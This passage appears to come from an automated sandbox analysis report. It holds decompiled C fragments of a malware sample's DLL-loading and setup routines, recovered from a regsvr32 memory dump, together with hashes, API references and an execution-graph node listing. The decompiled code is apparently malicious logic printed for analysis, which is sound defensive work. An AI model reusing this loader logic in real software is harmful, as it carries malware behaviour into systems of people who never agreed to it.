            								_t269 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t272;
            								__eflags =  *(_t161 + 4);
            								_t154 = _a4;
            								if( *(_t161 + 4) != 0) {
            									goto L53;
            								} else {
            									__eflags = _t154 - _t235;
            									if(_t154 != _t235) {
            										goto L53;
            									} else {
            										_t269 = _t222 - 3;
            									}
            								}
            							}
            							_t131 = _t272 + 0x38; // 0xf47d8bff
            							_t132 = _t272 + 0x5c; // 0xee85000
            							E009A7180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
            							_t134 = _t272 + 0x5c;
            							 *_t134 =  *(_t272 + 0x5c) + _a4;
            							__eflags =  *_t134;
            							E009A5EE0( *_t134,  *_t272);
            						} else {
            							__eflags = _t235;
            							if(_t235 != 0) {
            								L46:
            								__eflags = _t222;
            								if(_t222 != 0) {
            									_t162 =  *_t272;
            									__eflags =  *(_t162 + 4);
            									if( *(_t162 + 4) == 0) {
            										__eflags = _t235 - _t258;
            										if(_t235 <= _t258) {
            											goto L49;
            										}
            									}
            								}
            							} else {
            								__eflags = _t222 - 4;
            								if(_t222 == 4) {
            									goto L46;
            								}
            							}
            						}
            						asm("sbb edi, edi");
            						_t271 =  ~_t269 & 0x00000002;
            						__eflags = _t271;
            						return _t271;
            					} else {
            						__eflags = _t218 - 4;
            						if(_t218 == 4) {
            							goto L34;
            						} else {
            							_t173 =  *_t272;
            							__eflags =  *(_t173 + 4);
            							if( *(_t173 + 4) != 0) {
            								goto L34;
            							} else {
            								_t88 = _t272 + 0x5c; // 0xee85000
            								__eflags = _t254 -  *_t88;
            								if(_t254 !=  *_t88) {
            									goto L34;
            								} else {
            									return 1;
            								}
            							}
            						}
            					}
            				} else {
            					return 3;
            				}
            			}


            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 7f209831dea3d48f1611e155d6d65b02c5f919c1b971d3356a80ced1d80759e8
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: E6D12275A00B009FCB24CF6DC9C4A6AB7E5FF89304B24892DE89AC7711D771E945CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E0099D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
            				char _v8;
            				char _v12;
            				char _v140;
            				signed char _t14;
            				char _t15;
            				intOrPtr _t20;
            				void* _t25;
            				intOrPtr _t26;
            				intOrPtr _t32;
            				WCHAR* _t34;
            				intOrPtr _t35;
            				struct HINSTANCE__* _t37;
            				intOrPtr _t38;
            				intOrPtr _t46;
            				void* _t47;
            				intOrPtr _t50;
            				void* _t60;
            				void* _t61;
            				char _t62;
            				void* _t65;
            				intOrPtr _t66;
            				char _t68;
            
            				_t65 = __esi;
            				_t61 = __edi;
            				_t47 = __ebx;
            				_t50 =  *0x9af8d4; // 0x452fc00
            				_t14 =  *(_t50 + 0x1898);
            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
            					_t15 = E00999F85(_t50, 0xb9d);
            					_t66 =  *0x9af8d4; // 0x452fc00
            					_t62 = _t15;
            					_t67 = _t66 + 0xb0;
            					_v8 = _t62;
            					E00999FE4( &_v140, 0x40, L"%08x", E0099E34A(_t66 + 0xb0, E0099A5D0(_t66 + 0xb0), 0));
            					_t20 =  *0x9af8d4; // 0x452fc00
            					asm("sbb eax, eax");
            					_t25 = E00999F85(_t67, ( ~( *(_t20 + 0xa8)) & 0xfffffeb6) + 0xded);
            					_t26 =  *0x9af8d4; // 0x452fc00
            					_t68 = E00999C50(_t26 + 0x1020);
            					_v12 = _t68;
            					E00998D9A( &_v8);
            					_t32 =  *0x9af8d4; // 0x452fc00
            					_t34 = E00999C50(_t32 + 0x122a);
            					 *0x9af9d4 = _t34;
            					_t35 =  *0x9af8d0; // 0x452f8c0
            					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x9ac9d8,  &_v140, ".", L"dll", 0, 0x9ac9d8, _t25, 0x9ac9d8, _t62, 0, _t61, _t65, _t47);
            					_t37 = LoadLibraryW( *0x9af9d4);
            					 *0x9af9cc = _t37;
            					if(_t37 == 0) {
            						_t38 = 0;
            					} else {
            						_push(_t37);
            						_t60 = 0x28;
            						_t38 = E0099F08E(0x9acbc4, _t60);
            					}
            					 *0x9af9d0 = _t38;
            					E00998DDF( &_v12, 0xfffffffe);
            					E00998F63( &_v140, 0, 0x80);
            					if( *0x9af9d0 != 0) {
            						goto L10;
            					} else {
            						E00998DDF(0x9af9d4, 0xfffffffe);
            						goto L8;
            					}
            				} else {
            					L8:
            					if( *0x9af9d0 == 0) {
            						_t46 =  *0x9af908; // 0x452fa00
            						 *0x9af9d0 = _t46;
            					}
            					L10:
            					return 1;
            				}
            			}

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: f50a60e3f6a2d1633b9c3efbcf939d226613035a25ce0f5bd789f2aea3753152
            • Instruction ID: 76b57a9348df54fb75bfd6d2cd82f155a7d852adc29e8a56a29b2db07052e409
            • Opcode Fuzzy Hash: f50a60e3f6a2d1633b9c3efbcf939d226613035a25ce0f5bd789f2aea3753152
            • Instruction Fuzzy Hash: 9E3170B2615204ABDB10EBACDC56FAB33ECEF86714F14417AB109D75A1DE389D4087A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E009A36D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				char _v5;
            				long long _v12;
            				short _v20;
            				signed int _t15;
            				void* _t16;
            				signed int _t22;
            				char _t25;
            				void* _t26;
            				signed int _t28;
            				intOrPtr _t29;
            				void* _t31;
            				char** _t32;
            				long long _t40;
            				long long _t41;
            
            				_t40 = __fp0;
            				_t15 = E009A35EE(_a4);
            				 *_t32 = "msxml32.dll";
            				_t28 = _t15 & 0x0fffffff;
            				_t16 = E0099A5D0();
            				_t26 = 0xf;
            				_t25 = 0;
            				_v5 = 0;
            				if(_t16 > _t26) {
            					L2:
            					_t3 = _t25 + 0x41; // 0x41
            					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
            					_t25 = _t25 + 1;
            				} else {
            					_t26 = _t16;
            					if(_t26 != 0) {
            						do {
            							goto L2;
            						} while (_t25 < _t26);
            					}
            				}
            				lstrlenW( &_v20);
            				_t29 = _a8;
            				_t22 = _a12 - _t29 + 1;
            				_a12 = _t22;
            				asm("fild dword [ebp+0x10]");
            				if(_t22 < 0) {
            					_t40 = _t40 +  *0x9acf90;
            				}
            				_a12 = _t28;
            				_v12 = _t40;
            				_t41 = _v12;
            				asm("fild dword [ebp+0x10]");
            				if(_t28 < 0) {
            					_t41 = _t41 +  *0x9acf90;
            				}
            				_v12 = _t41;
            				asm("fmulp st1, st0");
            				L009A8995();
            				return _t29 - _t22;
            			}

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 009A371C
            • _ftol2_sse.MSVCRT ref: 009A375F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 066130ded4274e14e535777ca92309a176b32fe7e0c75d36529bbb2ffeb3d8f3
            • Instruction ID: 80eeedb99f360794c0bff557ef15581be560cec0bf4a769c5edfa8869e293f70
            • Opcode Fuzzy Hash: 066130ded4274e14e535777ca92309a176b32fe7e0c75d36529bbb2ffeb3d8f3
            • Instruction Fuzzy Hash: 9A1108B2A04259ABCF009F69E8051DE7FB5FF96310F268559F855C6255EB30C660C7C1
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:2000
            Total number of Limit Nodes:52
12045->12046 12278 445f323 12046->12278 12047 445558b 12048 4459f85 2 API calls 12047->12048 12049 4455595 12048->12049 12051 4459c50 2 API calls 12049->12051 12056 44555ac 12051->12056 12052 44555dc 12053 4458d9a 2 API calls 12052->12053 12055 44555e8 lstrcpynW lstrcpynW 12053->12055 12057 445562d 12055->12057 12056->12052 12059 4458ddf 2 API calls 12056->12059 12060 4458ddf 2 API calls 12057->12060 12058 44554af 12283 4458dc9 RtlAllocateHeap 12058->12283 12059->12052 12061 445563f 12060->12061 12062 4458ddf 2 API calls 12061->12062 12062->12024 12064 445550b 12064->12024 12065 4459f85 2 API calls 12064->12065 12066 4455520 12065->12066 12075 445b171 12074->12075 12076 445617d 12074->12076 12077 445b196 12075->12077 12079 4458ddf 2 API calls 12075->12079 12076->11783 12078 4458ddf 2 API calls 12077->12078 12080 445b1a1 12078->12080 12079->12075 12081 4458ddf 2 API calls 12080->12081 12081->12076 12083 4459b26 2 API calls 12082->12083 12084 445b350 12083->12084 12085 44636d5 2 API calls 12084->12085 12087 445b39d 12084->12087 12086 445b36f FindResourceW 12085->12086 12086->12084 12086->12087 12088 4458ddf 2 API calls 12087->12088 12089 445b3a8 12088->12089 12090 4458e2e RtlAllocateHeap 12089->12090 12091 4452c1a 12089->12091 12090->12091 12091->12007 12093 4452c47 12092->12093 12094 4459133 12092->12094 12093->12013 12125 4458dc9 RtlAllocateHeap 12094->12125 12096 445913d 12096->12093 12126 4459029 12096->12126 12099 4458ddf 2 API calls 12099->12093 12101 4459124 4 API calls 12100->12101 12102 445b074 12101->12102 12103 445b13d 12102->12103 12169 44592a4 12102->12169 12103->12016 12107 445b120 12108 44594d4 6 API calls 12107->12108 12109 445b128 12108->12109 12109->12016 12110 445b08e 12110->12107 12110->12109 12111 4458e5d 3 API calls 12110->12111 12175 4459a76 12110->12175 12111->12110 12115 44594e3 12113->12115 12124 4452c7b 12113->12124 12114 445951d 12118 445952d 12114->12118 12180 44595fb 12114->12180 12115->12114 12116 4458ddf 2 API calls 12115->12116 
12115->12124 12116->12115 12119 4458ddf 2 API calls 12118->12119 12120 4459548 12118->12120 12119->12120 12121 445955e 12120->12121 12123 4458ddf 2 API calls 12120->12123 12122 4458ddf 2 API calls 12121->12122 12122->12124 12123->12121 12124->12019 12125->12096 12140 4458dc9 RtlAllocateHeap 12126->12140 12128 445903e 12131 4459066 12128->12131 12139 445904b 12128->12139 12141 445957a 12128->12141 12129 44590ea 12132 4458ddf 2 API calls 12129->12132 12129->12139 12131->12129 12133 44590b4 12131->12133 12134 445957a lstrlenW 12131->12134 12132->12139 12133->12129 12133->12139 12145 445fd9c 12133->12145 12134->12133 12137 4459104 12138 4458ddf 2 API calls 12137->12138 12138->12139 12139->12093 12139->12099 12140->12128 12142 445959a 12141->12142 12143 4460485 lstrlenW 12142->12143 12144 44595be 12143->12144 12144->12131 12160 4458dc9 RtlAllocateHeap 12145->12160 12147 445ff2f 12148 4458ddf 2 API calls 12147->12148 12150 445ff55 12148->12150 12149 445fdc0 12149->12147 12161 4458dc9 RtlAllocateHeap 12149->12161 12152 4458ddf 2 API calls 12150->12152 12154 445ff63 12152->12154 12153 445fde0 12153->12147 12162 4458dc9 RtlAllocateHeap 12153->12162 12156 44590e3 12154->12156 12158 4458ddf 2 API calls 12154->12158 12156->12129 12156->12137 12157 445fdf4 12157->12147 12163 4458e5d 12157->12163 12158->12156 12160->12149 12161->12153 12162->12157 12168 4458dc9 RtlAllocateHeap 12163->12168 12165 4458e9a 12165->12157 12166 4458e72 12166->12165 12167 4458ddf 2 API calls 12166->12167 12167->12165 12168->12166 12172 44592c7 12169->12172 12170 4458dc9 RtlAllocateHeap 12170->12172 12171 44593fb 12174 4458dc9 RtlAllocateHeap 12171->12174 12172->12170 12172->12171 12173 4458ddf 2 API calls 12172->12173 12173->12172 12174->12110 12176 4459a81 12175->12176 12178 4459a97 12175->12178 12179 4458dc9 RtlAllocateHeap 12176->12179 12178->12110 12179->12178 12192 4458dc9 RtlAllocateHeap 12180->12192 12182 445963e 12182->12118 12183 4459634 12183->12182 12184 4459667 12183->12184 12186 44596e5 
12183->12186 12193 4458fb1 12184->12193 12187 4460485 lstrlenW 12186->12187 12190 44596dd 12187->12190 12188 4459673 12189 4460485 lstrlenW 12188->12189 12189->12190 12191 4458ddf 2 API calls 12190->12191 12191->12182 12192->12183 12194 44636d5 2 API calls 12193->12194 12197 4458fca 12194->12197 12195 4458ff7 12195->12188 12196 44636d5 2 API calls 12196->12197 12197->12195 12197->12196 12199 445f1dd 12198->12199 12200 4455328 12198->12200 12201 4459f6b 2 API calls 12199->12201 12200->12024 12200->12025 12202 445f1e9 12201->12202 12203 4459f6b 2 API calls 12202->12203 12204 445f1f8 12203->12204 12204->12200 12205 445f205 GetModuleHandleA 12204->12205 12206 445f212 GetModuleHandleA 12205->12206 12207 445f219 12205->12207 12206->12207 12208 4458d87 2 API calls 12207->12208 12209 445f224 12208->12209 12210 4458d87 2 API calls 12209->12210 12210->12200 12212 445b236 12211->12212 12213 445b246 GetLastError 12212->12213 12214 445b23c GetLastError 12212->12214 12215 445b253 12213->12215 12214->12215 12215->12030 12291 4459183 12216->12291 12218 445b151 12219 445b157 12218->12219 12311 445b074 12218->12311 12219->12038 12223 4455075 12222->12223 12224 44550aa 12223->12224 12324 445308a 12223->12324 12225 445c85a 9 API calls 12224->12225 12229 445510f 12224->12229 12227 44550ba 12225->12227 12228 445c64d 6 API calls 12227->12228 12230 44550ca 12228->12230 12229->12045 12229->12047 12340 4454ffb 12230->12340 12557 445f233 12278->12557 12281 4455464 12281->12047 12281->12058 12282 445f233 39 API calls 12282->12281 12283->12064 12321 4458dc9 RtlAllocateHeap 12291->12321 12293 44591a4 12294 44591b5 lstrcpynW 12293->12294 12302 44591ae 12293->12302 12295 4459228 12294->12295 12296 44591d8 12294->12296 12322 4458dc9 RtlAllocateHeap 12295->12322 12297 445b553 3 API calls 12296->12297 12299 44591e4 12297->12299 12301 445924d 12299->12301 12303 4459029 4 API calls 12299->12303 12300 4459233 12300->12301 12300->12302 12306 4458ddf 2 API calls 12300->12306 12305 4459275 12301->12305 
12308 4458ddf 2 API calls 12301->12308 12302->12218 12304 44591fe 12303->12304 12304->12300 12307 4459204 12304->12307 12309 4458ddf 2 API calls 12305->12309 12306->12301 12310 4458ddf 2 API calls 12307->12310 12308->12305 12309->12302 12310->12302 12312 44592a4 3 API calls 12311->12312 12313 445b087 12312->12313 12323 4458dc9 RtlAllocateHeap 12313->12323 12315 445b128 12315->12038 12316 445b120 12317 44594d4 6 API calls 12316->12317 12317->12315 12318 445b08e 12318->12315 12318->12316 12319 4458e5d 3 API calls 12318->12319 12320 4459a76 RtlAllocateHeap 12318->12320 12319->12318 12320->12318 12321->12293 12322->12300 12323->12318 12325 44530a6 12324->12325 12326 445109a 2 API calls 12325->12326 12339 4453141 12325->12339 12327 44530b9 12326->12327 12328 4459c50 2 API calls 12327->12328 12329 44530cb 12328->12329 12330 4458d9a 2 API calls 12329->12330 12331 44530d6 12330->12331 12332 445109a 2 API calls 12331->12332 12333 44530e0 12332->12333 12442 445cf54 12333->12442 12336 4458d9a 2 API calls 12339->12224 12341 4459b26 2 API calls 12340->12341 12342 4455006 12341->12342 12343 4459f85 2 API calls 12342->12343 12344 4455015 12343->12344 12345 4459c50 2 API calls 12344->12345 12346 4455021 12345->12346 12347 4458d9a 2 API calls 12346->12347 12348 445502c 12347->12348 12444 445cf81 12442->12444 12443 44530ee 12443->12336 12444->12443 12448 4458dc9 RtlAllocateHeap 12444->12448 12446 445cfb1 12446->12443 12448->12446 12559 445f267 12557->12559 12560 445f26b 12559->12560 12562 4458dc9 RtlAllocateHeap 12559->12562 12563 4454f5b 12559->12563 12560->12281 12560->12282 12562->12559 12564 4454f7e 12563->12564 12565 4454feb 12564->12565 12566 445503f 34 API calls 12564->12566 12565->12559 12568 4454f9e 12566->12568 12567 4454fdc 12586 4454e19 12567->12586 12568->12565 12568->12567 12571 445bcc1 12568->12571 12572 445bce2 12571->12572 12573 445bcdb 12571->12573 12574 445bcf6 12572->12574 12575 445bcee GetLastError 12572->12575 12573->12568 12575->12573 12587 445670a 5 API calls 
12586->12587 12635 4458dc9 RtlAllocateHeap 12613->12635 12615 4456816 12616 4456987 12615->12616 12636 4458dc9 RtlAllocateHeap 12615->12636 12616->11790 12618 4456896 12619 4458ddf 2 API calls 12618->12619 12620 4456979 12619->12620 12621 4458ddf 2 API calls 12620->12621 12621->12616 12622 4458f63 memset 12623 4456830 12622->12623 12623->12616 12623->12618 12623->12622 12624 445c402 11 API calls 12623->12624 12624->12623 12637 445ab0e 12625->12637 12628 4458dc9 RtlAllocateHeap 12628->11795 12630 445af73 12629->12630 12631 445a766 RtlAllocateHeap 12630->12631 12633 445af9b 12631->12633 12632 445b000 12632->11802 12633->12632 12634 4458ddf 2 API calls 12633->12634 12634->12632 12635->12615 12636->12623 12638 445acb3 4 API calls 12637->12638 12639 445ab2d 12638->12639 12640 445ab0b 12639->12640 12641 4458ddf 2 API calls 12639->12641 12640->11805 12640->12628 12641->12640 12643 445aaff 4 API calls 12642->12643 12644 4455a05 12643->12644 12677 4455a67 12644->12677 12678 445b423 12644->12678 12647 445abf8 6 API calls 12648 4455a2b 12647->12648 12683 445f537 12648->12683 12651 445b6e3 7 API calls 12652 4455a49 12651->12652 12652->12677 12690 445a29b 12652->12690 12656 4455a7f 12708 4451486 CreateMutexW 12656->12708 12658 4455a84 12659 445a398 6 API calls 12658->12659 12660 4455a92 12659->12660 12723 44534f7 12660->12723 12677->11442 12679 445a1f8 GetSystemTimeAsFileTime 12678->12679 12680 445b42e 12679->12680 12681 445abc9 6 API calls 12680->12681 12682 4455a19 12681->12682 12682->12647 12684 445f0d9 8 API calls 12683->12684 12685 445f549 12684->12685 12686 445f0d9 8 API calls 12685->12686 12687 445f562 12686->12687 12787 445f4c6 12687->12787 12689 4455a32 12689->12651 12691 445a2ac 12690->12691 12692 4455a71 12691->12692 12801 4458dc9 RtlAllocateHeap 12691->12801 12694 445a398 12692->12694 12695 445a3b6 12694->12695 12696 445a40e 12695->12696 12707 445a3ba 12695->12707 12802 445a2ee 12695->12802 12697 445a41f 12696->12697 12808 4458dc9 RtlAllocateHeap 12696->12808 12699 
445b222 2 API calls 12697->12699 12697->12707 12701 445a484 12699->12701 12702 445a4bf 12701->12702 12703 445a4fa SetThreadPriority 12701->12703 12704 445a4e3 12702->12704 12705 4458ddf 2 API calls 12702->12705 12703->12707 12706 4458f63 memset 12704->12706 12705->12704 12706->12707 12707->12656 12709 445149f CreateMutexW 12708->12709 12719 44514ec 12708->12719 12710 44514b1 12709->12710 12709->12719 12711 4451080 2 API calls 12710->12711 12712 44514bb 12711->12712 12713 4459a76 RtlAllocateHeap 12712->12713 12712->12719 12714 44514cb 12713->12714 12715 4458d87 2 API calls 12714->12715 12716 44514d8 12715->12716 12809 4458dc9 RtlAllocateHeap 12716->12809 12718 44514e2 12718->12719 12810 4458dc9 RtlAllocateHeap 12718->12810 12719->12658 12721 4451503 12721->12719 12811 44574d8 12721->12811 12724 4453505 12723->12724 12726 445350a 12723->12726 12815 445cb18 12724->12815 12727 44536a0 12726->12727 12728 445d210 8 API calls 12727->12728 12730 44536bb 12728->12730 12729 44536c4 12740 4452e9f 12729->12740 12730->12729 12822 4458dc9 RtlAllocateHeap 12730->12822 12732 44536d8 12739 44536e2 12732->12739 12823 445ce93 12732->12823 12734 4458ddf 2 API calls 12734->12729 12738 445a398 6 API calls 12738->12739 12739->12734 12741 445aaff 4 API calls 12740->12741 12742 4452ebd 12741->12742 12836 4452de9 12742->12836 12745 4452de9 3 API calls 12746 4452ee4 12745->12746 12840 445ab4b 12746->12840 12749 4459d29 RtlAllocateHeap 12756 4452f38 12788 445f4d4 12787->12788 12789 445f510 12787->12789 12800 4458dc9 RtlAllocateHeap 12788->12800 12791 4459f6b 2 API calls 12789->12791 12792 445f51a 12791->12792 12794 4459a76 RtlAllocateHeap 12792->12794 12793 445f4e5 12797 445f533 12793->12797 12798 4458ddf 2 API calls 12793->12798 12795 445f526 12794->12795 12796 4458d87 2 API calls 12795->12796 12796->12797 12797->12689 12799 445f509 12798->12799 12799->12689 12800->12793 12801->12692 12803 445a2f8 12802->12803 12804 445a31d 12803->12804 12805 4458ddf 2 API calls 12803->12805 12806 445a333 
12803->12806 12807 4458f63 memset 12804->12807 12805->12804 12806->12695 12807->12806 12808->12697 12809->12718 12810->12721 12812 44574dd 12811->12812 12813 445f0d9 8 API calls 12812->12813 12814 44574ef 12813->12814 12814->12719 12816 445cb2f 12815->12816 12817 445cb4e 12816->12817 12818 4459f85 2 API calls 12816->12818 12817->12726 12819 445cb5d lstrcmpiW 12818->12819 12820 445cb73 12819->12820 12821 4458d9a 2 API calls 12820->12821 12821->12817 12822->12732 12831 445cd08 12823->12831 12826 445cc72 12827 4459f85 2 API calls 12826->12827 12830 445cc98 12827->12830 12828 4458d9a 2 API calls 12829 445373c 12828->12829 12829->12738 12830->12828 12832 4458f63 memset 12831->12832 12834 445cd3f 12832->12834 12833 445cdf9 LocalAlloc 12835 44536ee 12833->12835 12834->12833 12834->12835 12835->12739 12835->12826 12837 4452e0a 12836->12837 12838 4452df3 12836->12838 12837->12745 12839 4458e5d 3 API calls 12838->12839 12839->12837 12847 445ab55 12840->12847 12848 445acb3 4 API calls 12847->12848 12849 4452eef 12848->12849 12849->12749 12849->12756 12969->11453 12970->11455 14130 4451295 14131 445aab0 4 API calls 14130->14131 14132 44512ac 14131->14132 14133 44512d1 14132->14133 14134 44636d5 2 API calls 14132->14134 14168 445117d 14133->14168 14134->14133 14137 4451306 14138 445ab83 4 API calls 14139 4451316 14138->14139 14167 44513d4 14139->14167 14175 4457c67 14139->14175 14140 445b305 4 API calls 14143 44513eb 14140->14143 14145 445b3f2 5 API calls 14143->14145 14144 445133d 14154 4458ddf 2 API calls 14144->14154 14147 44513f7 14145->14147 14146 4451371 14150 445b305 4 API calls 14146->14150 14363 4457aa7 14147->14363 14148 445ab83 4 API calls 14151 4451368 14148->14151 14153 445138d 14150->14153 14151->14146 14190 4456991 14151->14190 14341 445b3f2 14153->14341 14154->14137 14155 445142c 14392 445110a 14155->14392 14156 445143e 14156->14144 14162 445110a 8 API calls 14156->14162 14163 4451438 14162->14163 14402 44510ba 14163->14402 14167->14140 14169 4459f6b 2 API calls 
14168->14169 14170 445118e 14169->14170 14171 4459bfd 2 API calls 14170->14171 14172 44511aa 14171->14172 14173 4458d87 2 API calls 14172->14173 14174 44511b7 14173->14174 14174->14137 14174->14138 14410 4457eb5 14175->14410 14177 4457c84 14189 4451334 14177->14189 14421 44576f8 14177->14421 14179 4457cb5 14181 4458ddf 2 API calls 14179->14181 14180 4457cae 14180->14179 14438 4457692 14180->14438 14182 4457cf0 14181->14182 14184 4458ddf 2 API calls 14182->14184 14186 4457cfb 14184->14186 14188 4458ddf 2 API calls 14186->14188 14188->14189 14189->14144 14189->14146 14189->14148 14696 4458dc9 RtlAllocateHeap 14190->14696 14192 44569a7 14193 445aaff 4 API calls 14192->14193 14293 4456ea0 14192->14293 14194 44569bc 14193->14194 14697 445fd3d 14194->14697 14199 4459ab3 RtlAllocateHeap 14200 44569e0 14199->14200 14201 4459ab3 RtlAllocateHeap 14200->14201 14202 44569f4 14201->14202 14203 4456a19 14202->14203 14204 4459ab3 RtlAllocateHeap 14202->14204 14205 4459ab3 RtlAllocateHeap 14203->14205 14204->14203 14206 4456a3e 14205->14206 14723 445e849 14206->14723 14212 4456aac 14213 4456ab3 14212->14213 14770 4458dc9 RtlAllocateHeap 14212->14770 14216 445109a 2 API calls 14213->14216 14215 4456ac1 14215->14213 14218 445bb95 memset 14215->14218 14217 4456b02 14216->14217 14771 445b83a 14217->14771 14218->14213 14221 4458d9a 2 API calls 14222 4456b1c 14221->14222 14223 445109a 2 API calls 14222->14223 14224 4456b28 14223->14224 14225 445b83a 5 API calls 14224->14225 14226 4456b33 14225->14226 14227 4458d9a 2 API calls 14226->14227 14228 4456b42 14227->14228 14229 445109a 2 API calls 14228->14229 14230 4456b4a 14229->14230 14231 445b83a 5 API calls 14230->14231 14232 4456b55 14231->14232 14233 4458d9a 2 API calls 14232->14233 14234 4456b64 14233->14234 14235 445109a 2 API calls 14234->14235 14236 4456b70 14235->14236 14237 445b83a 5 API calls 14236->14237 14238 4456b7b 14237->14238 14239 4458d9a 2 API calls 14238->14239 14240 4456b8a 14239->14240 14241 4456bdc 14240->14241 14242 
445109a 2 API calls 14240->14242 14243 445109a 2 API calls 14241->14243 14244 4456ba3 14242->14244 14245 4456bec 14243->14245 14246 4459fe4 2 API calls 14244->14246 14247 445b83a 5 API calls 14245->14247 14248 4456bc5 14246->14248 14249 4456bf7 14247->14249 14250 4458d9a 2 API calls 14248->14250 14251 4458d9a 2 API calls 14249->14251 14253 4456bce 14250->14253 14252 4456c06 14251->14252 14254 445109a 2 API calls 14252->14254 14255 445b83a 5 API calls 14253->14255 14256 4456c12 14254->14256 14255->14241 14257 445b83a 5 API calls 14256->14257 14258 4456c1d 14257->14258 14259 4458d9a 2 API calls 14258->14259 14260 4456c2c 14259->14260 14261 445109a 2 API calls 14260->14261 14262 4456c34 14261->14262 14263 445b83a 5 API calls 14262->14263 14264 4456c3f 14263->14264 14265 4458d9a 2 API calls 14264->14265 14266 4456c4e 14265->14266 14267 445109a 2 API calls 14266->14267 14268 4456c5a 14267->14268 14269 445b83a 5 API calls 14268->14269 14270 4456c65 14269->14270 14271 4458d9a 2 API calls 14270->14271 14272 4456c74 14271->14272 14273 445109a 2 API calls 14272->14273 14274 4456c80 14273->14274 14275 445b83a 5 API calls 14274->14275 14276 4456c8b 14275->14276 14277 4458d9a 2 API calls 14276->14277 14278 4456c9a 14277->14278 14279 445109a 2 API calls 14278->14279 14280 4456ca6 14279->14280 14281 445b83a 5 API calls 14280->14281 14282 4456cb1 14281->14282 14283 4458d9a 2 API calls 14282->14283 14284 4456cc0 14283->14284 14285 445109a 2 API calls 14284->14285 14286 4456ccc 14285->14286 14287 445b83a 5 API calls 14286->14287 14288 4456cd7 14287->14288 14293->14146 14342 445aab0 4 API calls 14341->14342 14343 445b404 14342->14343 14344 445a1f8 GetSystemTimeAsFileTime 14343->14344 14345 4451399 14344->14345 14346 4457d0f 14345->14346 14874 4460522 14346->14874 14348 4457d2f 14877 4458146 14348->14877 15048 4459905 14363->15048 14366 4460522 GetTickCount 14367 4457aee 14366->14367 15054 4457f12 14367->15054 14369 4457b0e 14370 44576f8 19 API calls 14369->14370 14379 4451420 
14369->14379 14371 4457b3e 14370->14371 14375 4457692 8 API calls 14371->14375 14391 4457b45 14371->14391 14372 4458ddf 2 API calls 14373 4457c47 14372->14373 14374 4458ddf 2 API calls 14373->14374 14376 4457c52 14374->14376 14378 4457b6f 14375->14378 14377 4458ddf 2 API calls 14376->14377 14377->14379 14378->14391 15093 445793f 14378->15093 14379->14155 14379->14156 14381 4457b9a 14381->14391 15106 445780f 14381->15106 14384 445110a 8 API calls 14385 4457bda 14384->14385 14386 4457be6 14385->14386 14387 4458f63 memset 14385->14387 15120 44577be 14386->15120 14388 4457bfb 14387->14388 14390 4451d97 6 API calls 14388->14390 14390->14386 14391->14372 14393 4451120 14392->14393 14394 445a06e memset 14393->14394 14395 4451174 14393->14395 14396 4451146 14394->14396 14395->14163 14397 445a1f8 GetSystemTimeAsFileTime 14396->14397 14398 445115b 14397->14398 14399 445ac24 6 API calls 14398->14399 14400 4451169 14399->14400 14401 445abf8 6 API calls 14400->14401 14401->14395 14403 44510c6 14402->14403 14404 44510da 14402->14404 14405 445aaff 4 API calls 14403->14405 14406 445aaff 4 API calls 14404->14406 14407 44510cd 14405->14407 14406->14407 14408 4459fa5 2 API calls 14407->14408 14409 44510fd 14408->14409 14409->14144 14450 44611b3 14410->14450 14412 4457ebe 14454 4458927 14412->14454 14414 4457ed1 14415 4458927 strncpy 14414->14415 14416 4457ee5 14415->14416 14417 4458927 strncpy 14416->14417 14418 4457ef9 14417->14418 14458 4461c34 14418->14458 14420 4457f01 14420->14177 14550 44575e1 14421->14550 14424 445779f 14424->14180 14425 445bf56 RtlAllocateHeap 14426 4457732 14425->14426 14427 4457767 14426->14427 14561 44574fe 14426->14561 14428 4458ddf 2 API calls 14427->14428 14430 445777f 14428->14430 14431 4458ddf 2 API calls 14430->14431 14432 445778a 14431->14432 14434 4458ddf 2 API calls 14432->14434 14433 4457740 14433->14427 14569 445faaf 14433->14569 14436 4457795 14434->14436 14436->14424 14437 4458ddf 2 API calls 14436->14437 14437->14424 14439 445bfc8 2 API calls 
